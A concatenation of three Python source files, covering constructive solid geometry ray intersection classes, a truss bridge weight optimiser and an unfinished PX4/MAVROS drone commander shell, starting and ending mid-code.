set(ADDtwo_intersections[:]) combined_set = ADDone_set | ADDtwo_set combined_intersections = list(combined_set) """ Just in case... """ if len(combined_intersections) == 0: return None """ Sort by separation from ray origin """ intersection_separations = [] for point in combined_intersections: intersection_separations.append(separation(ray.position, point)) """ Convert into Numpy arrays in order to sort """ intersection_separations = np.array(intersection_separations) sorted_indices = intersection_separations.argsort() sorted_combined_intersections = [] for index in sorted_indices: sorted_combined_intersections.append(np.array(combined_intersections[index])) global_frame_intersections = [] for point in sorted_combined_intersections: global_frame_intersections.append(transform_point(point, self.transform)) global_frame_intersections_cleared = [] for point in global_frame_intersections: if self.on_surface(point) == True: """ This is only necessary if the two objects have an entire surface region in common, for example consider two boxes joined at one face. """ global_frame_intersections_cleared.append(point) if len(global_frame_intersections_cleared) == 0: return None return global_frame_intersections_cleared def on_surface(self, point): """ Returns True or False dependent on whether point on CSGadd surface or not """ if self.contains(point): return False invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.ADDone.on_surface(local_point) bool2 = self.ADDtwo.on_surface(local_point) if bool1 == True and self.ADDtwo.contains(local_point) == False: return True if bool2 == True and self.ADDone.contains(local_point) == False: return True if bool1 == bool2 == True: return True else: return False def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns surface-ID name if surface_point located on CSGadd surface """ """ Ensure surface_point on CSGadd surface """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.ADDone.on_surface(local_point) bool2 = self.ADDtwo.on_surface(local_point) assertbool = False if bool1 == True and self.ADDtwo.contains(local_point) == False: assertbool = True elif bool2 == True and self.ADDone.contains(local_point) == False: assertbool = True elif bool1 == bool2 == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True and self.ADDtwo.contains(local_point) == False: return self.reference + "_ADDone_" + self.ADDone.surface_identifier(local_point) if bool2 == True and self.ADDone.contains(local_point) == False: return self.reference + "_ADDtwo_" + self.ADDtwo.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Returns surface normal in point where ray hits CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.ADDone.on_surface(localray.position) bool2 = self.ADDtwo.on_surface(localray.position) assertbool = False if bool1 == True and self.ADDtwo.contains(localray.position) == False: assertbool = True elif bool2 == True and self.ADDone.contains(localray.position) == False: assertbool = True elif bool1 == bool2 == True: assertbool = True assert assertbool == True if bool1 == True and self.ADDtwo.contains(localray.position) == False: local_normal = self.ADDone.surface_normal(localray, acute) return transform_direction(local_normal, self.transform) if bool2 == True and self.ADDone.contains(localray.position) == False: local_normal = self.ADDtwo.surface_normal(localray, acute) return transform_direction(local_normal, self.transform) class CSGsub(object): """ Constructive Solid Geometry Boolean Subtraction """ def __init__(self, SUBplus, SUBminus): """ Definition {CSGsub} := {SUBplus}/{SUBminus} """ super(CSGsub, self).__init__() self.SUBplus = SUBplus self.SUBminus = SUBminus self.reference = 'CSGsub' self.transform = tf.identity_matrix() def append_name(self, namestring): """ In case a scene contains several CSG objects, this helps with surface identification """ self.reference = namestring def append_transform(self, new_transform): self.transform = tf.concatenate_matrices(new_transform, self.transform) def contains(self, point): """ Returns True if ray contained by CSGsub, False otherwise """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.SUBplus.contains(local_point) bool2 = self.SUBminus.contains(local_point) if bool1 == False: return False if bool2 == True: return False else: return True def intersection(self, ray): """ Returns the intersection points of ray with CSGsub in global frame """ # We will need the invtransform later when we return the results..." invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) SUBplus__intersections = self.SUBplus.intersection(localray) SUBminus__intersections = self.SUBminus.intersection(localray) """ Cover the simpler cases """ if SUBplus__intersections == None and SUBminus__intersections == None: return None """ Change ..._intersections into tuples """ if SUBplus__intersections != None: for i in range(0,len(SUBplus__intersections)): point = SUBplus__intersections[i] new_point = (point[0], point[1], point[2]) SUBplus__intersections[i] = new_point if SUBminus__intersections != None: for i in range(0,len(SUBminus__intersections)): point = SUBminus__intersections[i] new_point = (point[0], point[1], point[2]) SUBminus__intersections[i] = new_point """ Valid intersection points: SUBplus intersections must lie outside SUBminus SUBminus intersections must lie inside SUBplus """ SUBplus_intersections = [] SUBminus_intersections = [] if SUBplus__intersections != None: for intersection in SUBplus__intersections: if not self.SUBminus.contains(intersection): SUBplus_intersections.append(intersection) if SUBminus__intersections != None: for intersection in SUBminus__intersections: if self.SUBplus.contains(intersection): SUBminus_intersections.append(intersection) # SUBplus_set = set(SUBplus_intersections[:]) # SUBminus_set = set(SUBminus_intersections[:]) # combined_set = SUBplus_set ^ SUBminus_set # combined_intersections = list(combined_set) combined_intersections = np.array(list(set(SUBplus_intersections+SUBminus_intersections))) # intersection_separations = combined_intersections[0]**2+combined_intersections[1]**2+combined_intersections[2]**2 """ Just in case... """ if len(combined_intersections) == 0: return None transposed_intersections = combined_intersections.transpose() intersection_vectors = transposed_intersections[0]-ray.position[0], transposed_intersections[1]-ray.position[1], transposed_intersections[2]-ray.position[2] # intersection_separations= [] # print combined_intersections, point, intersection_vectors intersection_separations = intersection_vectors[0]**2+intersection_vectors[1]**2+intersection_vectors[2]**2 # for point in combined_intersections: # intersection_separations.append(separation(ray.position, point)) # for i in range(len(intersection_separations)): # print intersection_separations[i], intersection_separations2[i] """ Sort by distance from ray origin => Use Numpy arrays """ # intersection_separations = np.array(intersection_separations) sorted_combined_intersections = combined_intersections[intersection_separations.argsort()] # sorted_combined_intersections = [] # for index in sorted_indices: # sorted_combined_intersections.append(np.array(combined_intersections[index])) # global_frame_intersections = [] # for point in sorted_combined_intersections: # global_frame_intersections.append(transform_point(point, self.transform)) global_frame_intersections = [transform_point(point, self.transform) for point in sorted_combined_intersections] return global_frame_intersections def on_surface(self, point): """ Returns True if the point is on the outer or inner surface of the CSGsub, and False othewise. """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.SUBplus.on_surface(local_point) bool2 = self.SUBminus.on_surface(local_point) if bool1 == True and self.SUBminus.contains(local_point) == False: return True if bool2 == True and self.SUBplus.contains(local_point) == True: return True else: return False """ Alternatively: if bool1 == bool2 == False: return False if bool1 == True and bool2 == True or SUBminus.contains(point) == True: return False if bool2 == True and bool1 == True or SUBplus.contains(point) == False: return False else: return True """ def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns a unique identifier for the surface location on the CSGsub. """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.SUBplus.on_surface(local_point) bool2 = self.SUBminus.on_surface(local_point) assertbool = False if bool1 == True and self.SUBminus.contains(local_point) == False: assertbool = True elif bool2 == True and self.SUBplus.contains(local_point) == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True and self.SUBminus.contains(local_point) == False: return self.reference + "_SUBplus_" + self.SUBplus.surface_identifier(local_point) if bool2 == True and self.SUBplus.contains(local_point) == True: return self.reference + "_SUBminus_" + self.SUBminus.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Return the surface normal for a ray arriving on the CSGsub surface. """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.SUBplus.on_surface(localray.position) bool2 = self.SUBminus.on_surface(localray.position) assertbool = False if bool1 == True and self.SUBminus.contains(localray.position) == False: assertbool = True if bool2 == True and self.SUBplus.contains(localray.position) == True: assertbool = True assert assertbool == True if bool1 == True and self.SUBminus.contains(localray.position) == False: return self.SUBplus.surface_normal(ray, acute) if bool2 == True and self.SUBplus.contains(localray.position) == True: if acute: return self.SUBminus.surface_normal(ray,acute) else: normal = -1 * self.SUBminus.surface_normal(ray, acute=True) # Remove signed zeros for i in range(0,3): if normal[i] == 0.0: normal[i] = 0.0 return normal class CSGint(object): """ Constructive Solid Geometry Boolean Intersection """ def __init__(self, INTone, INTtwo): super(CSGint, self).__init__() self.INTone = INTone self.INTtwo = INTtwo self.reference = 'CSGint' self.transform = tf.identity_matrix() def append_name(self, namestring): """ In case a scene contains several CSG objects, this helps with surface identification """ self.reference = namestring def append_transform(self, new_transform): self.transform = tf.concatenate_matrices(new_transform, self.transform) def contains(self, point): """ Returns True if ray contained by CSGint, False otherwise """ invtransform = tf.inverse_matrix(self.transform) point = transform_point(point, invtransform) bool1 = self.INTone.contains(point) bool2 = self.INTtwo.contains(point) if bool1 == bool2 == True: return True else: return False def intersection(self, ray): """ Returns the intersection points of ray with CSGint in global frame """ # We will need the invtransform later when we return the results..." invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) INTone__intersections = self.INTone.intersection(localray) INTtwo__intersections = self.INTtwo.intersection(localray) """ Cover the simpler cases """ if INTone__intersections == None and INTtwo__intersections == None: return None """ Change ..._intersections into tuples """ if INTone__intersections != None: for i in range(0,len(INTone__intersections)): point = INTone__intersections[i] new_point = (point[0], point[1], point[2]) INTone__intersections[i] = new_point if INTtwo__intersections != None: for i in range(0,len(INTtwo__intersections)): point = INTtwo__intersections[i] new_point = (point[0], point[1], point[2]) INTtwo__intersections[i] = new_point """ Only intersection points contained in resp. other structure relevant """ INTone_intersections = [] INTtwo_intersections = [] if INTone__intersections != None: for i in range(0,len(INTone__intersections)): if self.INTtwo.contains(INTone__intersections[i]) == True: INTone_intersections.append(INTone__intersections[i]) if INTtwo__intersections != None: for j in range(0,len(INTtwo__intersections)): if self.INTone.contains(INTtwo__intersections[j]) == True: INTtwo_intersections.append(INTtwo__intersections[j]) """ => Convert to list """ INTone_set = set(INTone_intersections[:]) INTtwo_set = set(INTtwo_intersections[:]) combined_set = INTone_set | INTtwo_set combined_intersections = list(combined_set) """ Just in case... """ if len(combined_intersections) == 0: return None """ Sort by separation from ray origin """ intersection_separations = [] for point in combined_intersections: intersection_separations.append(separation(ray.position, point)) """ Convert into Numpy arrays in order to sort """ intersection_separations = np.array(intersection_separations) sorted_indices = intersection_separations.argsort() sorted_combined_intersections = [] for index in sorted_indices: sorted_combined_intersections.append(np.array(combined_intersections[index])) global_frame_intersections = [] for point in sorted_combined_intersections: global_frame_intersections.append(transform_point(point, self.transform)) return global_frame_intersections def on_surface(self, point): """ Returns True or False dependent on whether point on CSGint surface or not """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(point, invtransform) bool1 = self.INTone.on_surface(local_point) bool2 = self.INTtwo.on_surface(local_point) if bool1 == bool2 == True: return True if bool1 == True and self.INTtwo.contains(local_point): return True if bool2 == True and self.INTone.contains(local_point): return True else: return False def surface_identifier(self, surface_point, assert_on_surface = True): """ Returns surface-ID name if surface_point located on CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) local_point = transform_point(surface_point, invtransform) bool1 = self.INTone.on_surface(local_point) bool2 = self.INTtwo.on_surface(local_point) assertbool = False if bool1 == True and self.INTtwo.contains(local_point) == True: assertbool = True if bool2 == True and self.INTone.contains(local_point) == True: assertbool = True if bool1 == bool2 == True: assertbool = True if assert_on_surface == True: assert assertbool == True if bool1 == True: return self.reference + "_INTone_" + self.INTone.surface_identifier(local_point) if bool2 == True: return self.reference + "_INTtwo_" + self.INTtwo.surface_identifier(local_point) def surface_normal(self, ray, acute=True): """ Returns surface normal in point where ray hits CSGint surface """ """ Ensure surface_point on CSGint surface """ invtransform = tf.inverse_matrix(self.transform) localray = Ray() localray.position = transform_point(ray.position, invtransform) localray.direction = transform_direction(ray.direction, invtransform) bool1 = self.INTone.on_surface(localray.position) bool2 = self.INTtwo.on_surface(localray.position) assertbool = False if bool1 == True and self.INTtwo.contains(localray.position) == True: assertbool = True if bool2 == True and self.INTone.contains(localray.position) == True: assertbool = True if bool1 == bool2 == True: assertbool = True assert assertbool == True if bool1 == True: return self.INTone.surface_normal(ray, acute) else: return self.INTtwo.surface_normal(ray, acute) if __name__ == '__main__': """ TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST TEST """ """ # EXAMPLE ZERO INTone = Box(origin = (-1.,0.,0.), extent = (1,1,1)) INTtwo = Cylinder(1, 1) #one.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) intersect = CSGint(INTone, INTtwo) INTthree = Cylinder(0.5,1) intersect2 = CSGint(intersect, INTthree) """ """ # EXAMPLE ONE obj1 = Box(origin=(0,0,0), extent=(3,3,5)) obj2 = Box(origin=(1,1,0), extent=(2,2,7)) boxbox = CSGadd(obj2, obj1) boxbox.append_name('MyBoxBox') pt = (1,3,1.5) ray = Ray(position=(1,3,1.5), direction=(0.,-1.,0.)) print "Point: " print pt print "Ray position: " print ray.position print "Ray direction: " print ray.direction print "\n----> test .contains(pt) " print obj1.contains(pt) print obj2.contains(pt) print boxbox.contains(pt) print "\n----> test .on_surface(pt)" print obj1.on_surface(pt) print obj2.on_surface(pt) print boxbox.on_surface(pt) print "\n----> test .surface_identifier(pt)" print boxbox.surface_identifier(pt) print "\n----> test .intersection(ray)" print obj1.intersection(ray) print obj2.intersection(ray) print boxbox.intersection(ray) print "\n----> test .surface_normal(ray)" print boxbox.surface_normal(ray) # END EXAMPLE ONE """ """ # EXAMPLE TWO: ITERATIVE ADDITION obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,0,0), extent=(1,1,1)) #obj2.append_transform(tf.translation_matrix((0,2,0))) obj2.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) print obj2.transform boxbox1 = CSGadd(obj2, obj1) boxbox1.append_name('MyBoxBox1') boxbox1.append_transform(tf.translation_matrix((0,0,0))) boxbox2 = CSGadd(obj2, obj1) boxbox2.append_name('MyBoxBox2') boxbox2.append_transform(tf.translation_matrix((0,0,2))) fourbox = CSGadd(boxbox1, boxbox2) fourbox.append_name('MyFourBox') print boxbox1.transform print '\n' print boxbox2.transform print '\n' print fourbox.transform print '\n' print obj2.intersection(ray) ray = Ray(position=(0.5,10,0.5), direction=(0,-1,0)) print fourbox.intersection(ray) ray = Ray(position=(0.5,10,2.5), direction=(0,-1,0)) print fourbox.intersection(ray) print '\nSurface_ID for FourBox' print fourbox.surface_identifier((0.9,3,0.5)) """ """ obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,0,0), extent=(1,1,1)) obj2.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) obj2.append_transform(tf.translation_matrix((0.5,0,0))) add = CSGadd(obj1, obj2) ray = Ray(position=(0.50000000001,10,0.5), direction=(0,-1,0)) print add.intersection(ray) """ """ # EXAMPLE THREE # Illustrates that if for example two boxes are joined at # one face with CSGadd, then none of the points on this face are # surface points (as should be for most of these points). # However, a ray that is contained in that face will # not return any intersection points with the CSGadd object # (which should not be for some points). obj1 = Box(origin=(0,0,0), extent=(1,1,1)) obj2 = Box(origin=(0,1,0), extent=(1,2,1)) add = CSGadd(obj1, obj2) ray = Ray(position=(0.5,10,0.5), direction=(0,-1,0)) print add.intersection(ray) print add.on_surface((0.5,1,0.5)) print add.contains((0.5,1.,0.5)) ray = Ray(position=(10,1,0.5), direction=(-1,0,0)) print add.intersection(ray) """ """ # EXAMPLE FOUR: CSG VISUALISER INTone = Box(origin = (-1.,-1.,-0.), extent = (1,1,7)) INTtwo = Box(origin = (-0.5,-0.5,0), extent = (0.5,0.5,7)) #INTtwo.append_transform(tf.translation_matrix((0,0.5,0))) INTtwo.append_transform(tf.rotation_matrix(np.pi/4, (0,0,1))) MyObj = CSGsub(INTone, INTtwo) MyObj.append_name('myobj') vis=Visualiser() vis.VISUALISER_ON = True vis.addCSG(MyObj,0.03,-1,1,-1,1,0,10,visual.color.green) #vis.addCSG(MyObj, visual.color.blue) """ """ box1 = Box() box2 = Box(origin = (0.2,.2,0), extent = (0.8,0.8,1)) csg = CSGsub(box1, box2) ray = Ray(position = (0.5,0.8,0.5), direction = (0,-1,0)) normal = csg.surface_normal(ray, acute = False) print normal normal = csg.surface_normal(ray, acute = False) print normal """
python
import numpy as np import math import Graphics from typing import List import json from scipy.optimize import fmin_powell Vector = List[float] import time class Node (object): """A object that defines a position""" def __init__(self, name: str, pos, constraint_x=0, constraint_y=0): """Node: has a name, position and constraints. The loads are are added when the distributed weight is placed on the beam. A optional value is optimize, for each dimension the position of the node can be optimized t optimise the construction""" self.name: str = name self.pos = np.array(pos) self.load: Vector = np.array([0, 0]) self.load_list = np.array([0]) self.constraint_x = constraint_x self.constraint_y = constraint_y self.optimize: List = np.array([0, 0]) def __str__(self): text: str = self.name text += ": " + str(self.pos) return text class Beam (object): """A beam or rod that is positioned between two nodes A beam knows the two nodes it is placed between and therefore its length, with other data as density and cross-section area the weight can be determined, the placed load is divided for the two nodes.""" def __init__(self, name: str, nodes, v_load, a, b): self.name: str = name self.length: float = self.absolute(nodes[a].pos-nodes[b].pos) self.a_node = a self.b_node = b self.pos1: Vector = nodes[a].pos self.pos2: Vector = nodes[b].pos self.load: Vector = np.array(v_load) self.load_nodes: Vector = 0.5 * np.array(v_load) * self.length self.delta_0: Vector = nodes[a].pos-nodes[b].pos self.delta_1: Vector = nodes[b].pos - nodes[a].pos self.angle_0: float = math.atan2(self.delta_0[1], self.delta_0[0]) self.angle_1: float = math.atan2(self.delta_1[1], self.delta_1[0]) self.area = 0.10 self.E_modulus = 210 * 1e+9 self.density = 7850 self.yield_strength = 250 * 1e+6 self.internal_force = 0 self.weight = 0.0 self.connections = np.zeros(len(2 * nodes)) self.connections[2 * a] = math.cos(self.angle_0) self.connections[2 * a + 1] = math.sin(self.angle_0) self.connections[2 * b] = math.cos(self.angle_1) self.connections[2 * b + 1] = math.sin(self.angle_1) @staticmethod def absolute(arr): """Return the absolute length of a vector""" return np.linalg.norm(arr) def calculate_beam_weight(self, new_force): """ calculates weight of a beam using the internal force of the beam and yield strength of the material :param new_force: :return: - """ self.internal_force = abs(new_force) if new_force >= 0: # Force is stretching beam self.area = self.internal_force / self.yield_strength else: # Force is compressing beam self.area = math.pow(((self.internal_force * (0.5 * self.length) ** 2 / ( math.pi ** 2 * self.E_modulus)) / (math.pi / 4)), 1 / 2) * math.pi self.weight = self.area * self.length * self.density def __str__(self): """ Overwrites str method, prints important data of the beam :return text: """ text: str = "\n" text += "Beam: " + self.name + "\n" text += "\tLength: {0:.2f} m\n".format(round(self.length, 2)) text += "\tArea: {0:.2f} mm²\n".format(round(self.area * 1e6, 2)) text += "\tWeight: {0:.3f} kg\n".format(round(self.weight, 3)) return text def single_line(self): text: str = self.name text += ": {0:.2f}m".format(round(self.length, 2)) text += ", {0:.2f}mm²".format(round(self.area * 1e6, 2)) text += ", {0:.3f}kg".format(round(self.weight, 3)) return text class Construction(object): def __init__(self, name: str, nodes: List, beam_list: List, load_list: List): """ Creates a construction with the given nodes, beam, loads and constraints :param name: :param nodes: :param beam_list: """ self.temp_beams = beam_list self.materials = {} self.material: str = "" self.name: str = name self.window = Graphics.Construction("Bridge 1", 1280, 720) self.nodes: List = nodes self.beams: List = [] self.current_loads = 0 self.load_list = load_list self.beams = [] self.last_iteration = False self.max_beams = [] self.set_beams() self.optional_loads: List = [] self.iteration = 0 # Declare later used data self.matrix = [] self.B = [] self.X = [] self.weight = np.inf self.get_materials() self.inter_plot = False print("Construction created...") def set_beams(self): """ Rebuilds all beams between the nodes with the new values :return: """ self.beams = [] for x in range(0, len(self.temp_beams)): self.beams.append(Beam(str(self.temp_beams[x][0]), self.nodes, self.load_list[self.current_loads][x], self.temp_beams[x][1], self.temp_beams[x][2])) def optimize(self, active=True, inter_plot=True): """ Optimize will generate a construction with minimal weight for the load that is given Optional: active will activate the minimization function to create a highly optimized construction :param active: :param inter_plot: :return: """ self.inter_plot = inter_plot initial_guess = [] for x in range(0, len(self.nodes)): if not np.any(self.nodes[x].optimize): continue for val in range(0, len(self.nodes[x].optimize)): if self.nodes[x].optimize[val] != 0: initial_guess.append(self.nodes[x].pos[val]) initial_guess = np.array(initial_guess) print("Initial Guess", initial_guess) print("Calculating Construction....") constructions_weights = [] load_nr_max_weight = [] results = [] self.max_beams = [] for a in range(0, len(self.load_list)): # Loop through all loads self.current_loads = a print("\n\nCalculating construction for load: ", self.current_loads) # Create optimal for current load if active: result = fmin_powell(self.set_and_calculate, initial_guess, xtol=0.01, ftol=0.005) else: result = self.set_and_calculate(initial_guess) self.plot_construction() constructions_weights.append(self.weight) load_nr_max_weight.append(a) results.append(result) self.max_beams.append(self.beams) for y in range(0, len(self.load_list)): # Make construction strong so that current optimal can hold all loads if a == y: continue self.current_loads = y self.set_and_calculate(result) for t in range(0, len(self.beams)): if self.max_beams[a][t].weight < self.beams[t].weight: self.max_beams[a][t] = self.beams[t] # Calculate the weight of current strong optimal self.weight = 0 for t in range(0, len(self.beams)): self.beams[t] = self.max_beams[a][t] self.weight += self.beams[t].weight if self.weight > constructions_weights[a]: constructions_weights[a] = self.weight load_nr_max_weight[a] = y minimum = min(constructions_weights) load_index = constructions_weights.index(minimum) self.current_loads = load_nr_max_weight[load_index] self.set_and_calculate(results[load_index]) self.beams = self.max_beams[load_index] self.weight = minimum print("\n\nThe best weight for all loads is:", minimum, "kg") print("This is bridge is optimized for load nr: ", load_index) self.plot_construction(finished=True) while True: self.window.hold() def set_and_calculate(self, new_values): """ Sets the variable positions, rebuilds all the beams and calculates the weight of the construction :return: """ self.iteration += 1 t = 0 for x in range(0, len(self.nodes)): if not np.any(self.nodes[x].optimize): continue for val in range(0, len(self.nodes[x].optimize)): if self.nodes[x].optimize[val] != 0: self.nodes[x].pos[val] = new_values[t] t += 1 self.set_beams() self.get_weight() if self.inter_plot: try: self.plot_construction() except: print("\nWarning plot failed \n") return self.weight def get_weight(self): lightest_weight = np.inf best_material = {} for material in self.materials: self.set_material(self.materials[material]) self.calculate_weight() if self.weight < lightest_weight: best_material = material lightest_weight = self.weight self.set_material(self.materials[best_material]) self.material = str(best_material) self.calculate_weight() def get_max_beams(self): pass def calculate_weight(self): """ Calculates the weight of each beam and the total weight of the construction using linear algebra :return: """ self.matrix = [] for x in range(0, len(self.beams)): self.matrix.append(self.beams[x].connections) self.matrix = np.array(self.matrix) self.matrix = self.matrix.transpose() size = np.shape(self.matrix) missing = size[0] - size[1] for x in range(0, missing): zeros = np.array([np.zeros(size[0])]) self.matrix = np.concatenate((self.matrix, zeros.T), axis=1) t = size[1] for x in range(0, len(self.nodes)): if self.nodes[x].constraint_x != 0: self.matrix[2 * x][t] = self.nodes[x].constraint_x t += 1 if self.nodes[x].constraint_y != 0: self.matrix[2 * x + 1][t] = self.nodes[x].constraint_y t += 1 self.B = np.zeros(np.shape(self.matrix)[0]) for x in range(0, len(self.nodes)): self.nodes[x].load = np.array([0, 0]) for x in range(0, len(self.beams)): self.nodes[self.beams[x].a_node].load = \ self.nodes[self.beams[x].a_node].load + self.beams[x].load_nodes self.nodes[self.beams[x].b_node].load = \ self.nodes[self.beams[x].b_node].load + self.beams[x].load_nodes for x in range(0, len(self.nodes)): self.B[2 * x] = self.nodes[x].load[0] self.B[2 * x + 1] = self.nodes[x].load[1] self.weight = 0 try: self.X = np.dot(np.linalg.inv(self.matrix), self.B) except np.linalg.linalg.LinAlgError: print("\nWarning linear algebra Error\n") self.X = np.full(size[0], 1e20) for x in range(0, len(self.beams)): self.beams[x].calculate_beam_weight(self.X[x]) self.weight += self.beams[x].weight return self.weight def set_material(self, current_material: dict): """Sets the currently selected material""" for beam in self.beams: beam.yield_strength = current_material["yield_strength"] beam.E_modulus = current_material["E_modulus"] beam.density = current_material["density"] def get_materials(self): """Gets all available materials from the materials.json dictionary""" with open("materials.json", "r") as read_file: self.materials = json.load(read_file) read_file.close() self.set_material(self.materials[list(self.materials.keys())[0]]) def __str__(self): """Overwritten method to print its data in a certain format when using print() or str()""" text: str = "\n " text += "\nA =\n" + str(self.matrix) text += "\n\nB = \n" + str(self.B) text += "\n\nX = \n" + str(self.X) text += "\n\n\t " for x in range(0, len(self.beams)): text += str(self.beams[x]) text += "\n\nTotal weight bridge: {0:.3f} kg\n".format(round(self.weight, 3)) return text def plot_construction(self, finished=False): offset: Vector = (200, 400) def inv(pos: Vector): pos: Vector = pos * np.array([1, -1]) # invert y-axis for graphics pos: Vector = pos * 200 + offset return pos for beam in self.beams: self.window.draw_beam(beam.name, inv(beam.pos1), inv(beam.pos2), beam.internal_force, size=int((beam.area * 1e6)**0.7)) for node in self.nodes: self.window.draw_node(node.name, inv(node.pos)) self.window.draw_force(node.name, inv(node.pos), node.load) if node.constraint_x != 0: self.window.draw_constraint_x(node.name + "x", inv(node.pos)) if node.constraint_y != 0: self.window.draw_constraint_y(node.name + "y", inv(node.pos)) if np.any(node.optimize): self.window.draw_editable(inv(node.pos)) self.window.add_text((50, 50), "Weight: {0:.3f} kg".format(round(self.weight, 3))) self.window.add_text((50, 70), "Material: " + self.material) self.window.add_text((50, 90), "Iteration: " + str(self.iteration)) if finished: self.window.add_text((50, 30), "OPTIMAL SOLUTION FOUND: ") self.window.add_text((50, 520), "NODES: ") for x in range(0, len(self.nodes)): b = 50 + (x // 5) * 150 h = (x % 5) * 30 + 550 self.window.add_text((b, h), str(self.nodes[x])) self.window.add_text((400, 520), "BEAMS: ") for x in range(0, len(self.beams)): b = 400 + (x // 5) * 300 h = (x % 5) * 30 + 550 self.window.add_text((b, h), self.beams[x].single_line()) self.window.show() if __name__ == "__main__": np.set_printoptions(precision=2) scale: float = 1 # meter load: float = 1000 # Newton # A list of all the nodes in the construction o_nodes = [ Node("A", (0.00001, 0.00001), constraint_x=-1, constraint_y=-1), Node("B", (1.00001 * scale, 0.00001)), Node("C", (1.99999 * scale, 0.00001)), Node("D", (3.00001 * scale, 0.00001)), Node("E", (4.00001 * scale, 0.00001), constraint_y=-1), Node("F", (3.00002 * scale, 1.00002 * scale)), Node("G", (2.00001 * scale, 1.000001 * scale)), Node("H", (1.00003 * scale, 1.00003 * scale)) ] # A list of all the beams or rods that connect to certain nodes o_beams = [ ["AB", 0, 1], ["AH", 0, 7], ["BC", 1, 2], ["BH", 1, 7], ["BG", 1, 6], ["CD", 2, 3], ["CG", 2, 6], ["DE", 3, 4], ["DF", 3, 5], ["DG", 3, 6], ["EF", 4, 5], ["FG", 5, 6], ["GH", 6, 7], ] # A list of all the different loads placed on the beams o_loads = [ [ [0, -1 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -1 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] , [ [0, -2 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -0.5 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] , [ [0, -3 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, -4 * load], [0, 0], [0, -1 * load], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0] ] ] # All dimensions of the nodes that will be optimized are given a 1 value o_nodes[1].optimize = np.array([1, 0]) o_nodes[2].optimize = np.array([1, 0]) o_nodes[3].optimize = np.array([1, 0]) o_nodes[5].optimize = np.array([1, 1]) o_nodes[6].optimize = np.array([1, 1]) o_nodes[7].optimize = np.array([1, 1]) # Creates a construction with the given nodes and beams bridge_1 = Construction("Bridge 1", o_nodes, o_beams, o_loads) # The bridge is calculated for most optimal weight/load ratio bridge_1.optimize(active=True, inter_plot=True) print(bridge_1)
python
""" This commander shell will be a implementation of the PX4 'commander' CLI (https://docs.px4.io/v1.9.0/en/flight_modes/). Here you can switch modes on the go. Will require root access for safety reasons. """ from cmd import Cmd import logger import rospy from mavros_msgs.srv import CommandBool banner = """ _____ ____ __ __ __ __ _ _ _____ ______ _____ / ____/ __ \| \/ | \/ | /\ | \ | | __ \| ____| __ \ | | | | | | \ / | \ / | / \ | \| | | | | |__ | |__) | | | | | | | |\/| | |\/| | / /\ \ | . ` | | | | __| | _ / | |___| |__| | | | | | | |/ ____ \| |\ | |__| | |____| | \ \ \_____\____/|_| |_|_| |_/_/ \_\_| \_|_____/|______|_| \_\ """ log = logger.get_logger(__name__) def parse(arg): 'Convert a series of zero or more numbers to an argument tuple' return tuple(arg.split()) class CommanderCmd(Cmd): intro = banner+ "\nType ? to see a list of available commands" prompt = "Commander > " #Takeoff Auto [Position fix required (e.g. GPS)] Vehicle initiates the takeoff sequence using either catapult/hand-launch mode or runway takeoff mode (in the current direction). def do_takeoff(self, inp): pass def help_takeoff(self): pass #Land Auto [Position fix required (e.g. GPS)] Vehicle initiates the fixed-wing landing sequence. def do_land(self,inp): pass def help_land(self): pass #Hold Auto [Position fix required (e.g. GPS)] Vehicle circles around the GPS hold position at the current altitude. def do_hold(self,inp): pass def help_hold(self): pass #Return Auto [Position fix required (e.g. GPS)] Vehicle ascends to a safe height and then returns to its home position and circles. def do_return(self, inp): pass def help_return(self): pass #Mission Auto [Position fix required (e.g. GPS)] Vehicle executes a predefined mission/flight plan that has been uploaded to the flight controller. def do_mission(self, inp): pass def help_mission(self): pass ### Commander Shell functionality ## def do_arm(self,inp): rospy.wait_for_service("/mavros/cmd/arming") try: arming = rospy.ServiceProxy("mavros/cmd/arming", CommandBool) if inp.lower() == "true": resp = arming(True) resp = "Success: " + str(resp.success) elif inp.lower() == "false": resp = arming(False) resp = "Success: " + str(resp.success) else: resp = "No value argument (true/false) given" print(resp) except rospt.ServiceException, e: print("Service arm call failed: %s"%e) ### WP Shell functionality ## def do_exit(self,inp): print() if input("Do you want to exit commander? Y/[N] ").lower() == "y": log.info("Exiting the commander") return True def help_exit(self): 